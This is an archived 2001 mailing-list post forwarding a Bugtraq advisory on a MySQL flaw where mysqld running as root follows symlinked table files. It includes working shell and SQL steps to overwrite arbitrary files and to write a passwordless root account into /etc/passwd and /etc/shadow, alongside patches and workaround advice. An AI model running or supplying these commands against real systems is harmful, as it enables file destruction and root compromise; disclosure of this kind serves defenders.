[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

(fwd) potential vulnerability of mysqld running with root privileges (can be used as good DoS or r00t expoloit)

To: linux-delhi@xxxxxxxxxxxxxxxxxxxxx, linux-india-help@xxxxxxxxxxxxxxxxxxxxx
Subject: (fwd) potential vulnerability of mysqld running with root privileges (can be used as good DoS or r00t expoloit)
From: Raju Mathur <raju@xxxxxxxxxxxxxxx>
Date: Tue, 20 Mar 2001 10:02:40 +0530 (IST)
Reply-to: raju@xxxxxxxxxxxxxxx

[Oooh, I love this exploit!  Haven't tried it myself, maybe someone on
the list can send a few mails as root from a r00ted server and confirm
it works? :-)

Please run MySQL as non-root for atleast a modicum of security --
Raju]

This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------

Return-Path: <BUGTRAQ@xxxxxxxxxxxxxxxxx>
Approved-By: aleph1@xxxxxxxxxxxxxxxxx
Delivered-To: bugtraq@xxxxxxxxxxxxxxxxxxxxxxx
X-Mailer: The Bat! (v1.35) S/N 9FA473A9
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <15897.010318@xxxxx>
Reply-To: lesha@xxxxx
Organization: NN.ru
X-cc:         rus@xxxxxxxx, stepler@xxxxxx
From: "Pavlov, Lesha" <lesha@xxxxx>
Sender: Bugtraq List <BUGTRAQ@xxxxxxxxxxxxxxxxx>
To: BUGTRAQ@xxxxxxxxxxxxxxxxx
Subject:      potential vulnerability of mysqld running with root privileges
              (can be used as good DoS or r00t expoloit)
Date:         Sun, 18 Mar 2001 21:32:37 +0300

Anybody, who get login and password to mysql can use it as DoS or r00t
exploit because mysql accepts '../blah-blah' as valid database name and
each table represented by 3 files tablename.ISD, tablename.ISM and
tablename.frm, But, when mysqld checks table already exists or not
exists, it checks _only_ tablename.frm :

Usage this "vulnerable features of mysql" to make big DoS (Will
Overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.

Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!

Recomendations:
* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as incorrect
database names.
* And Main recomendation - do not run mysqld as root!!!

Patches:
 not yet

Workaround:
chowns existing database tables to a normal user and run mysqld as this
unprivileged user - it will be better solution!.

Vulnerable versions:
This DoS/exploit tested on mysql-3.20.32a but i see another versions of
mysql also vulnerabile.

Comments:
Mysql dox recomends dont run mysqld as root, but People from RedHat
didnt read mysql dox - mysql istalled from rpm is vulnerable.

------------------------------

End of this Digest
******************

-- 
Raju Mathur          raju@xxxxxxxxxxxxx           http://kandalaya.org/

Prev by Subject: (fwd) FORW: [ANNOUNCE] Apache 1.3.19 Released
Next by Subject: (fwd) Security Update: several buffer overflows in imap, ipop2d and ipop3d CSSA-2001-011.0
Previous by thread: (fwd) [CLA-2001:387] Conectiva Linux Security Announcement - icecast
Next by thread: immutable bit?( linux related)
Index(es):
- Subject
- Thread